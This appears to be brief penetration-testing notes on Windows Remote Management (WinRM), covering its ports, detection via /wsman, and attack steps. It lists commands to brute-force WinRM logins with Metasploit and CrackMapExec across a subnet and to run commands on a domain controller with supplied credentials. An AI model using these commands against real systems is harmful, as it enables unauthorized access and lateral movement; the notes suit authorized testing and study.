Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based. Usually run on port 5985.
WinRM uses the PSRemoting (PowerShell remote) to login to a host and execute commands.
You can enable WinRM by running Enable-PSRemoting
By default WinRM uses port 5985 for sending traffic over HTTP (But it's still encrypted), and port 5986 for SSL.
If you can make a HTTP request (GET) to /wsman and you get 200 back, WinRM is enabled (on port 5985).
net localgroup "Remote Management Users" /add bowen
The winrm_login module is a standard Metasploit login scanner to bruteforce passwords.
use auxiliary/scanner/winrm/winrm_login
cme winrm 192.168.1.0/24 -u userfile -p passwordfile
From a powershell command prompt:
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }